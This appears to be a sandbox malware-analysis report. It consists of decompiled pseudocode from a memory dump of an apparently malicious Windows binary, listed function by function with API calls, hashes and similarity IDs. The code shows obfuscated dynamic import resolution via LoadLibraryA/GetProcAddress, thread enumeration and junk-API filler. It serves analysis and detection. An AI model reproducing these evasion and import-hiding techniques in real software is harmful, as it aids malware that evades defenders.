                                                                							E000E8F20( &_v140, E000D9D50(0x647400c8));
                                                                							_t187 = _t183 + 0x1c;
                                                                							_t91 =  *_t155;
                                                                							if( *_t155 != 0) {
                                                                								_t176 = 0;
                                                                								do {
                                                                									 *((char*)(_t177 + _t176 - 0x88)) = E000ED680(0, _t91);
                                                                									_t176 = _t176 - E000D22E0(0, 0, 1);
                                                                									E000D1460(0, _t176, 1);
                                                                									_t187 = _t187 + 0x14;
                                                                									_t91 =  *(_t155 + _t176) & 0x000000ff;
                                                                								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
                                                                							}
                                                                							_push(0xffffffff);
                                                                							_t93 = E000E00A0( &_v140);
                                                                							_t183 = _t187 + 8;
                                                                							if(_t93 == _a8) {
                                                                								_t136 = _v32;
                                                                								_t170 = E000D1460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E000D9D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
                                                                								_t100 = E000D22E0(__eflags, _t136, 0x52cc09fc);
                                                                								_t159 = _v36;
                                                                								_v20 = _t100;
                                                                								E000D1460(__eflags, _t136, _t159);
                                                                								_t141 = _t170;
                                                                								_t191 = _t183 + 0x1c;
                                                                								__eflags = _t170 - _t136;
                                                                								if(_t170 > _t136) {
                                                                									_t102 = _v20;
                                                                									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
                                                                									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
                                                                										_v24 =  *_t141;
                                                                										_v20 = _t141;
                                                                										_t105 = E000D7DD0(0x82);
                                                                										_t192 = _t191 + 4;
                                                                										_t144 = _v24;
                                                                										_t137 = 0;
                                                                										__eflags = _t144 - _t105;
                                                                										if(_t144 != _t105) {
                                                                											_t122 = _t144;
                                                                											_t175 = 0;
                                                                											__eflags = 0;
                                                                											0;
                                                                											do {
                                                                												 *(_t177 + _t175 - 0x88) = _t122;
                                                                												_t124 = E000D1460(__eflags, E000D22E0(__eflags, 0, _t175), 0xffffffff);
                                                                												_t137 =  ~_t124;
                                                                												E000D1460(__eflags, _t175, 1);
                                                                												_t192 = _t192 + 0x18;
                                                                												_t175 = _t137;
                                                                												_t122 =  *(_v20 - _t124) & 0x000000ff;
                                                                												__eflags = _t122 - 0x2e;
                                                                											} while (__eflags != 0);
                                                                										}
                                                                										_t160 = E000D1460(__eflags, _t137, E000D9D50(0x3638cbc4));
                                                                										E000D1460(__eflags, _t137, 1);
                                                                										_v24 = _v20 + _t160 - 0x524ccb67;
                                                                										 *((char*)(_t177 + _t137 - 0x88)) = E000D7DD0(0x82);
                                                                										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
                                                                										_t112 = E000D9D50(0x8707952b);
                                                                										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
                                                                										_t113 = E000D7DD0(0xc0);
                                                                										_v28 = 0;
                                                                										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
                                                                										_t114 = _v20;
                                                                										 *((char*)(_t177 + _t137 - 0x84)) = 0;
                                                                										_t173 = _t114;
                                                                										_t115 = E000D7DD0(0x8f);
                                                                										_t199 = _t192 + 0x24;
                                                                										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
                                                                										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
                                                                											_t174 = _v24;
                                                                										} else {
                                                                											_t139 = _v24[1];
                                                                											__eflags = _t139;
                                                                											if(_t139 == 0) {
                                                                												_t174 =  &_v28;
                                                                											} else {
                                                                												_t161 = _t160 + _t173 - 0x524ccb65;
                                                                												do {
                                                                													_t120 = E000D55A0(_v28, 0xa);
                                                                													_t199 = _t199 + 8;
                                                                													_v28 = _t139 + _t120 - 0x30;
                                                                													_t139 =  *_t161 & 0x000000ff;
                                                                													_t161 =  &(_t161[1]);
                                                                													__eflags = _t139;
                                                                												} while (_t139 != 0);
                                                                												_t174 =  &_v28;
                                                                											}
                                                                										}
                                                                										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
                                                                									}
                                                                								}
                                                                							} else {
                                                                								goto L7;
                                                                							}
                                                                							goto L22;
                                                                							L7:
                                                                							_t135 = _t135 + 1;
                                                                							_t143 =  &(_v24[4]);
                                                                							_t153 =  &(_v20[1]);
                                                                						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
                                                                						_t141 = 0;
                                                                					}
                                                                				}
                                                                				L22:
                                                                				return _t141;
                                                                			}





















































                                                                0x000dd839
                                                                0x000dd83c
                                                                0x000dd83e
                                                                0x000dd840
                                                                0x000dd847
                                                                0x000dd852
                                                                0x000dd854
                                                                0x000dd85b
                                                                0x000dd860
                                                                0x000dd862
                                                                0x000dd865
                                                                0x000dd86d
                                                                0x000dd873
                                                                0x000dd873
                                                                0x000dd880
                                                                0x000dd894
                                                                0x000dd89f
                                                                0x000dd8af
                                                                0x000dd8b4
                                                                0x000dd8bb
                                                                0x000dd8be
                                                                0x000dd8c4
                                                                0x000dd8cc
                                                                0x000dd8d0
                                                                0x000dd8d2
                                                                0x000dd8d5
                                                                0x000dd8ea
                                                                0x000dd8f0
                                                                0x000dd90d
                                                                0x000dd912
                                                                0x000dd915
                                                                0x000dd919
                                                                0x000dd91b
                                                                0x000dd920
                                                                0x000dd92c
                                                                0x000dd942
                                                                0x000dd944
                                                                0x000dd949
                                                                0x000dd94c
                                                                0x000dd950
                                                                0x000dd920
                                                                0x000dd954
                                                                0x000dd95d
                                                                0x000dd962
                                                                0x000dd968
                                                                0x000dd98d
                                                                0x000dd9c4
                                                                0x000dd9d0
                                                                0x000dd9d8
                                                                0x000dd9db
                                                                0x000dd9e0
                                                                0x000dd9e5
                                                                0x000dd9e7
                                                                0x000dd9ea
                                                                0x000dd9ec
                                                                0x000dd9f2
                                                                0x000dd9fc
                                                                0x000dd9fe
                                                                0x000dda06
                                                                0x000dda0e
                                                                0x000dda11
                                                                0x000dda16
                                                                0x000dda19
                                                                0x000dda1c
                                                                0x000dda1e
                                                                0x000dda20
                                                                0x000dda22
                                                                0x000dda24
                                                                0x000dda24
                                                                0x000dda2c
                                                                0x000dda30
                                                                0x000dda30
                                                                0x000dda45
                                                                0x000dda51
                                                                0x000dda56
                                                                0x000dda5b
                                                                0x000dda61
                                                                0x000dda65
                                                                0x000dda68
                                                                0x000dda68
                                                                0x000dda30
                                                                0x000dda83
                                                                0x000dda88
                                                                0x000dda9a
                                                                0x000ddaaa
                                                                0x000ddab1
                                                                0x000ddabe
                                                                0x000ddac8
                                                                0x000ddad7
                                                                0x000ddae5
                                                                0x000ddaec
                                                                0x000ddaf3
                                                                0x000ddaf6
                                                                0x000ddb05
                                                                0x000ddb0c
                                                                0x000ddb11
                                                                0x000ddb14
                                                                0x000ddb16
                                                                0x000ddb54
                                                                0x000ddb18
                                                                0x000ddb1e
                                                                0x000ddb21
                                                                0x000ddb23
                                                                0x000ddb59
                                                                0x000ddb25
                                                                0x000ddb25
                                                                0x000ddb30
                                                                0x000ddb35
                                                                0x000ddb3a
                                                                0x000ddb44
                                                                0x000ddb47
                                                                0x000ddb4a
                                                                0x000ddb4b
                                                                0x000ddb4b
                                                                0x000ddb4f
                                                                0x000ddb4f
                                                                0x000ddb23
                                                                0x000ddb70
                                                                0x000ddb70
                                                                0x000dd9fe
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dd96a
                                                                0x000dd973
                                                                0x000dd974
                                                                0x000dd977
                                                                0x000dd97a
                                                                0x000dd983
                                                                0x000dd983
                                                                0x000dd86d
                                                                0x000ddb72
                                                                0x000ddb7b

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?), ref: 000DDB62
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 000DDB6A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: d$l
                                                                • API String ID: 2574300362-91452987
                                                                • Opcode ID: dc93868cf63f52f6e76aead13cbcdb0a3a241c06c2eea5036e4de1166b4958bc
                                                                • Instruction ID: 6ac562511bee486726a2c7d9b541d6ce3eff0e8f27a465fb8bd1e3487678933e
                                                                • Opcode Fuzzy Hash: dc93868cf63f52f6e76aead13cbcdb0a3a241c06c2eea5036e4de1166b4958bc
                                                                • Instruction Fuzzy Hash: 0291F8B6D00315ABDB109FB4AC42AFE7BA5AF16358F450066EC49B7343EA319A1487B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000E69A0(void* __eflags) {
                                                                				intOrPtr _v32;
                                                                				signed int _v36;
                                                                				void* _v44;
                                                                				signed char _t13;
                                                                				signed int _t16;
                                                                				signed int _t19;
                                                                				long _t23;
                                                                				void* _t24;
                                                                				void* _t25;
                                                                				void* _t27;
                                                                
                                                                				_t24 = CreateToolhelp32Snapshot(4, 0);
                                                                				_v44 = E000D9D50(0x647400b0);
                                                                				_t23 = GetCurrentProcessId();
                                                                				_t13 = E000D55C0(Thread32First(_t24,  &_v44), 0);
                                                                				_t27 = _t25 + 0xc;
                                                                				if((_t13 & 0x00000001) != 0) {
                                                                					L6:
                                                                					_t19 = 0;
                                                                				} else {
                                                                					0;
                                                                					0;
                                                                					while(GetLastError() != 0x12) {
                                                                						_t16 = E000D55C0(_v32, _t23);
                                                                						_t27 = _t27 + 8;
                                                                						_t19 =  ~(_t16 & 0x00000001) & _v36;
                                                                						if(Thread32Next(_t24,  &_v44) != 0) {
                                                                							if(_t19 == 0) {
                                                                								continue;
                                                                							} else {
                                                                							}
                                                                						}
                                                                						goto L7;
                                                                					}
                                                                					goto L6;
                                                                				}
                                                                				L7:
                                                                				return _t19;
                                                                			}













                                                                0x000e69b2
                                                                0x000e69c1
                                                                0x000e69ca
                                                                0x000e69d9
                                                                0x000e69de
                                                                0x000e69e3
                                                                0x000e6a25
                                                                0x000e6a25
                                                                0x000e69eb
                                                                0x000e69eb
                                                                0x000e69ef
                                                                0x000e69f0
                                                                0x000e69ff
                                                                0x000e6a04
                                                                0x000e6a11
                                                                0x000e6a1d
                                                                0x000e6a21
                                                                0x00000000
                                                                0x00000000
                                                                0x000e6a23
                                                                0x000e6a21
                                                                0x00000000
                                                                0x000e6a1d
                                                                0x00000000
                                                                0x000e69f0
                                                                0x000e6a27
                                                                0x000e6a30

                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000E69AD
                                                                • GetCurrentProcessId.KERNEL32 ref: 000E69C4
                                                                • Thread32First.KERNEL32(00000000,?), ref: 000E69D1
                                                                • GetLastError.KERNEL32 ref: 000E69F0
                                                                • Thread32Next.KERNEL32(00000000,?), ref: 000E6A16
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1709709923-0
                                                                • Opcode ID: ce297d60281bf4069ad4591a643bc3b1ba39e77d73970ad2db4fbd700c17b3ac
                                                                • Instruction ID: 84f46d719f9ad2763e0b57bed1dc68c864fbe30675a1be7fb2114ee33d4cc758
                                                                • Opcode Fuzzy Hash: ce297d60281bf4069ad4591a643bc3b1ba39e77d73970ad2db4fbd700c17b3ac
                                                                • Instruction Fuzzy Hash: 9701DF72E403446FEB107AA6BC96BFF3E6CAB51355F480131F904B1223E91A990486B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000D2340(char _a4) {
                                                                				signed int _v20;
                                                                				struct HDC__* _v24;
                                                                				signed int _v28;
                                                                				signed int _t28;
                                                                				signed int _t29;
                                                                				signed int _t30;
                                                                				struct HWND__* _t32;
                                                                				int _t34;
                                                                				struct HWND__* _t35;
                                                                				signed int _t36;
                                                                				signed int _t39;
                                                                				int _t42;
                                                                				signed int _t48;
                                                                				signed int _t49;
                                                                				signed int _t54;
                                                                				void* _t56;
                                                                				signed int _t58;
                                                                				int _t59;
                                                                
                                                                				_t1 =  &_a4; // 0xd2f73
                                                                				_t56 =  *_t1;
                                                                				_t34 = _t56 & 0x00000100;
                                                                				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
                                                                				_t35 = _t34 * _t56;
                                                                				_t39 = 0;
                                                                				if(_t35 != _t56) {
                                                                					_t36 = _t35 | _t56;
                                                                					_t32 = _t36 * _t56;
                                                                					_t39 = _t36 * _t32 | _t32;
                                                                					_t35 = _t32;
                                                                				}
                                                                				_t54 = _t39 ^ _t56;
                                                                				DestroyWindow(_t35);
                                                                				_t58 = _t39 * _t54;
                                                                				_v20 = _t58;
                                                                				_t3 =  &_a4; // 0xd2f73
                                                                				_t59 =  *_t3;
                                                                				_t42 = _t58 - _t59;
                                                                				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
                                                                					_t48 = _t42 * _t35;
                                                                					_t5 = _t54 - 0x513615fe; // -1362499070
                                                                					_t49 = _t48 + _t5;
                                                                					_t42 = _t48 + 0xaec9ea02;
                                                                					_v24 = _t49;
                                                                					_t28 = _t54 * _t49;
                                                                					_v28 = _t28;
                                                                					_t29 = _t28 + 0xc9;
                                                                					_t30 = _t29 * _t35;
                                                                					_t35 = _t29 * _t35 >> 0x20;
                                                                					_v20 = _t30;
                                                                				}
                                                                				if(_t35 >= _t59 && _t42 != _t59) {
                                                                					MoveToEx(_v24, _t59, _t42, _t59);
                                                                					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
                                                                				}
                                                                				return 0;
                                                                			}





















                                                                0x000d2349
                                                                0x000d2349
                                                                0x000d234e
                                                                0x000d2363
                                                                0x000d2369
                                                                0x000d236c
                                                                0x000d2370
                                                                0x000d2372
                                                                0x000d2376
                                                                0x000d237e
                                                                0x000d2381
                                                                0x000d2381
                                                                0x000d2385
                                                                0x000d238a
                                                                0x000d2390
                                                                0x000d2393
                                                                0x000d2398
                                                                0x000d2398
                                                                0x000d239e
                                                                0x000d23a6
                                                                0x000d23b2
                                                                0x000d23b5
                                                                0x000d23b5
                                                                0x000d23bc
                                                                0x000d23c2
                                                                0x000d23c5
                                                                0x000d23c8
                                                                0x000d23d0
                                                                0x000d23d2
                                                                0x000d23d4
                                                                0x000d23d6
                                                                0x000d23d6
                                                                0x000d23e2
                                                                0x000d23ee
                                                                0x00000000
                                                                0x000d2410
                                                                0x000d2419

                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,000D2F73,?,?,?,?,?,000DAE51), ref: 000D2363
                                                                • DestroyWindow.USER32 ref: 000D238A
                                                                • MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000D23EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: DestroyEnumMoveValueWindow
                                                                • String ID: s/
                                                                • API String ID: 1329181790-3311094731
                                                                • Opcode ID: 8630ca3b2e36bde0f543aad5d577884cbc8ff06bef9849e364e9938c14067508
                                                                • Instruction ID: f24f2617c315ada4656aa81a10ff16b5fa01be02947cdc14bd54eeb9dc8b1d66
                                                                • Opcode Fuzzy Hash: 8630ca3b2e36bde0f543aad5d577884cbc8ff06bef9849e364e9938c14067508
                                                                • Instruction Fuzzy Hash: BE2126717002395FDB1C8AA88CD65BFBEEDEB98660B05013BF406DB7A1E5A48D4182F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000D46E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
                                                                				signed int _v20;
                                                                				signed int _t33;
                                                                				int _t34;
                                                                				signed int _t45;
                                                                				struct tagRECT* _t46;
                                                                				signed char _t47;
                                                                				signed int _t48;
                                                                				WCHAR* _t49;
                                                                				struct HWND__* _t50;
                                                                				signed char _t51;
                                                                				signed char _t55;
                                                                				signed int _t57;
                                                                				signed int _t58;
                                                                				signed int _t59;
                                                                				signed int _t62;
                                                                				struct _LUID* _t63;
                                                                				signed int _t64;
                                                                				signed int _t71;
                                                                				int _t73;
                                                                				signed int _t75;
                                                                				signed int _t81;
                                                                				signed int _t82;
                                                                				struct HDC__* _t83;
                                                                				signed int _t84;
                                                                
                                                                				_t73 = _a12;
                                                                				_t83 = _a8;
                                                                				_t45 = _t83 * 0x59;
                                                                				_t46 = _t45 ^ 0x000000fa;
                                                                				_t47 = _t46 & (_t45 ^ 0x00000023);
                                                                				OffsetRect(_t46, _t73, _t73);
                                                                				_t55 = _t47 + 0xbd;
                                                                				_t57 = (_t55 ^ _t47) + _t47;
                                                                				_t48 = _t55;
                                                                				_v20 = _t57;
                                                                				_t58 = _t57;
                                                                				_t75 = (_t58 + _t83) * _t48;
                                                                				if(_t83 != _t73 || _t58 >= _a8) {
                                                                					_t84 = _t75;
                                                                					_t49 = _t48 + _t84;
                                                                					_t83 = _t84 + _t49;
                                                                					LookupPrivilegeValueW(_t49, _t83, _a4);
                                                                					_t59 = _t83 + _t49;
                                                                					_t75 = _t59 | _t49;
                                                                					_t33 = _t49;
                                                                					_t48 = _t83;
                                                                					if(_a4 == 0xd9f29025) {
                                                                						goto L3;
                                                                					}
                                                                				} else {
                                                                					_t59 = _v20;
                                                                					if(_a4 != 0xd9f29025) {
                                                                						L7:
                                                                						_v20 = _t59;
                                                                						if(_t59 != _a12) {
                                                                							L11:
                                                                							_t34 = _a4;
                                                                							_t50 = _t48 + _t34;
                                                                							EndDialog(_t50, _t34);
                                                                							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
                                                                							_t62 = _t81 * _t50;
                                                                							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
                                                                							_t33 = _t50;
                                                                							_t48 = _t81;
                                                                							L12:
                                                                							if(_a8 == _a12) {
                                                                								_t82 = _t62;
                                                                								_t63 = _a4;
                                                                								if(_t63 != _a8 && _t33 != _t63) {
                                                                									SetTextColor(_t83, _a12);
                                                                									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
                                                                								}
                                                                							}
                                                                							return _t48;
                                                                						}
                                                                						_t64 = _t75;
                                                                						if(_t64 != _a12 || _t64 == _a4) {
                                                                							goto L11;
                                                                						} else {
                                                                							_t62 = _v20;
                                                                							goto L12;
                                                                						}
                                                                					}
                                                                					L3:
                                                                					if(_a8 != 0xd9f29025) {
                                                                						_t71 = _t59;
                                                                						if(_t71 == _a8) {
                                                                							_t59 = _t71;
                                                                						} else {
                                                                							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
                                                                							_t51 = _t48 + _t33;
                                                                							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
                                                                							_t59 = _t51 * _t83;
                                                                							_t48 = _t59 * 0x6c000000 >> 0x18;
                                                                						}
                                                                					}
                                                                				}
                                                                			}



























                                                                0x000d46e7
                                                                0x000d46ea
                                                                0x000d46ed
                                                                0x000d46f4
                                                                0x000d46fa
                                                                0x000d46ff
                                                                0x000d4709
                                                                0x000d4711
                                                                0x000d4713
                                                                0x000d4715
                                                                0x000d4718
                                                                0x000d4720
                                                                0x000d4725
                                                                0x000d4781
                                                                0x000d4784
                                                                0x000d4786
                                                                0x000d4791
                                                                0x000d479a
                                                                0x000d479f
                                                                0x000d47a1
                                                                0x000d47a3
                                                                0x000d47ab
                                                                0x00000000
                                                                0x00000000
                                                                0x000d472c
                                                                0x000d4731
                                                                0x000d473a
                                                                0x000d47ad
                                                                0x000d47ad
                                                                0x000d47b6
                                                                0x000d47ca
                                                                0x000d47ca
                                                                0x000d47cd
                                                                0x000d47d1
                                                                0x000d47e2
                                                                0x000d47e7
                                                                0x000d47f9
                                                                0x000d47fc
                                                                0x000d47fe
                                                                0x000d4800
                                                                0x000d4806
                                                                0x000d4808
                                                                0x000d480a
                                                                0x000d4810
                                                                0x000d481d
                                                                0x000d4838
                                                                0x000d4838
                                                                0x000d4810
                                                                0x000d4844
                                                                0x000d4844
                                                                0x000d47b8
                                                                0x000d47be
                                                                0x00000000
                                                                0x000d47c5
                                                                0x000d47c5
                                                                0x00000000
                                                                0x000d47c5
                                                                0x000d47be
                                                                0x000d473c
                                                                0x000d4743
                                                                0x000d4745
                                                                0x000d474d
                                                                0x000d4845
                                                                0x000d4753
                                                                0x000d475d
                                                                0x000d4760
                                                                0x000d476d
                                                                0x000d4773
                                                                0x000d477c
                                                                0x000d477c
                                                                0x000d474d
                                                                0x000d4743

                                                                APIs
                                                                • OffsetRect.USER32 ref: 000D46FF
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,-000F1D33,?), ref: 000D4791
                                                                • EndDialog.USER32 ref: 000D47D1
                                                                • SetTextColor.GDI32(-02611D33,-03E51D33), ref: 000D481D
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
                                                                • String ID:
                                                                • API String ID: 2289036324-0
                                                                • Opcode ID: 5f299aa4d712137568103ea074311c606deb4ae947a04dd25c1fb5ee591d5d13
                                                                • Instruction ID: 886ccbea61d33320a4fc21647aace926b6370f7f3d44b6e0c485a2c24c441891
                                                                • Opcode Fuzzy Hash: 5f299aa4d712137568103ea074311c606deb4ae947a04dd25c1fb5ee591d5d13
                                                                • Instruction Fuzzy Hash: D6412733B006249BDB18CE58CCE46BF77EAEB95361B16812AE819DB741C634AD45C7D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000D29D0(void* __eax, struct HWND__* _a4) {
                                                                				int _v20;
                                                                				signed int _t14;
                                                                				struct HDC__* _t21;
                                                                				signed int _t26;
                                                                				signed int _t28;
                                                                				long _t29;
                                                                				void* _t32;
                                                                				struct HWND__* _t33;
                                                                				signed int _t37;
                                                                				signed int _t38;
                                                                				struct HDC__* _t40;
                                                                				struct HWND__* _t42;
                                                                				signed int _t43;
                                                                				void* _t44;
                                                                				void** _t46;
                                                                
                                                                				_t33 = _a4;
                                                                				_t26 = _t33 + (_t33 & 0x00000004);
                                                                				_t40 = _t26 * 0x6e;
                                                                				DeleteDC(_t40);
                                                                				_t14 = _t33 * _t40 * _t26;
                                                                				_t42 = _t40 + _t14 ^ 0x00000191;
                                                                				if(_t33 == 0x191 || _t42 != _t33) {
                                                                					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
                                                                					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
                                                                					_t14 = (_t2 | 0x00000383) * 0x383;
                                                                				}
                                                                				_v20 = _t14;
                                                                				_t43 = _t42 * _t14;
                                                                				_t4 = _t43 + 0x368; // -973259
                                                                				_t28 = _t4 - _t14;
                                                                				_t37 = _t28 ^ _t43;
                                                                				_t6 = _t43 + 0x368; // -972387
                                                                				_t44 = _t37 + _t6;
                                                                				ResetEvent(_t44);
                                                                				_t29 = _t28 ^ _t44;
                                                                				_t38 = _t37 | _t29;
                                                                				_t32 = _t38 & _t44;
                                                                				_t7 = _t32 + 0x31; // -973210
                                                                				_t21 = _t7 * _t44;
                                                                				_t46 = (_t21 + _t29) * _t38;
                                                                				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
                                                                				return _t46 * _t32;
                                                                			}


















                                                                0x000d29d7
                                                                0x000d29df
                                                                0x000d29e1
                                                                0x000d29e5
                                                                0x000d29f0
                                                                0x000d29f5
                                                                0x000d2a01
                                                                0x000d2a17
                                                                0x000d2a1f
                                                                0x000d2a2b
                                                                0x000d2a2b
                                                                0x000d2a31
                                                                0x000d2a34
                                                                0x000d2a37
                                                                0x000d2a3d
                                                                0x000d2a41
                                                                0x000d2a43
                                                                0x000d2a43
                                                                0x000d2a4b
                                                                0x000d2a51
                                                                0x000d2a53
                                                                0x000d2a57
                                                                0x000d2a59
                                                                0x000d2a5c
                                                                0x000d2a62
                                                                0x000d2a6f
                                                                0x000d2a81

                                                                APIs
                                                                • DeleteDC.GDI32(-000EDD33), ref: 000D29E5
                                                                • SetWindowPos.USER32(-000EDD33,000D7BEC,00000191,000D7BEC,000D7BEC,000D7BEC,00000191), ref: 000D2A1F
                                                                • ResetEvent.KERNEL32(-000ED663,?,000D7BEC,-000F1FA0,-03E51D33,-000F1D33,?,000D9287,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000D2A4B
                                                                • CreateDIBSection.GDI32(-000ED99A,-000ED99A,-000ED9CB,-000ED663,-000ED9CB,-000ED9CB), ref: 000D2A6F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateDeleteEventResetSectionWindow
                                                                • String ID:
                                                                • API String ID: 201249963-0
                                                                • Opcode ID: a093cd7281110ba089eba81dd4ce5a35cc0e4f0637cd4220eb37b0637e46947c
                                                                • Instruction ID: e58b1a1dcecc92b154da25c4f9b890a2962e8316dad6111c3e398b337ecc57c4
                                                                • Opcode Fuzzy Hash: a093cd7281110ba089eba81dd4ce5a35cc0e4f0637cd4220eb37b0637e46947c
                                                                • Instruction Fuzzy Hash: 24112B73B002247FE7248A5ADC49EEBBA5EE7C9710F060126F849DB251D9756F05C6E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000EDA20() {
                                                                				char _v28;
                                                                				void* _t4;
                                                                
                                                                				_t4 = CreateEventW(0, 1, 0, E000D7200(0xf05f8,  &_v28));
                                                                				if(_t4 != 0) {
                                                                					SetEvent(_t4);
                                                                					_t4 = CloseHandle(_t4);
                                                                				}
                                                                				SetLastError(0);
                                                                				return _t4;
                                                                			}





                                                                0x000eda3f
                                                                0x000eda47
                                                                0x000eda4c
                                                                0x000eda53
                                                                0x000eda53
                                                                0x000eda5b
                                                                0x000eda66

                                                                APIs
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001), ref: 000EDA3F
                                                                • SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000EDA4C
                                                                • CloseHandle.KERNEL32(00000000), ref: 000EDA53
                                                                • SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000F1D33,?,000D91EB,-000F1D33,?,000D77A1,00000001,?,-000F1D33,?,000D6A74), ref: 000EDA5B
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Event$CloseCreateErrorHandleLast
                                                                • String ID:
                                                                • API String ID: 2055590504-0
                                                                • Opcode ID: 18b84b9c3f0e78b305a43d93c7f640bc2774f4007c04a3933604b9f85e54b9d2
                                                                • Instruction ID: 7f70ade641ec25971a9f433371b02680cfc4a8d1a2f18df562efc1cc10b81b5f
                                                                • Opcode Fuzzy Hash: 18b84b9c3f0e78b305a43d93c7f640bc2774f4007c04a3933604b9f85e54b9d2
                                                                • Instruction Fuzzy Hash: D3E04FB1684204BBF75077E56C0AFBA3A6C9B00B42F440061FB0DE9583EAA99554D7B6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%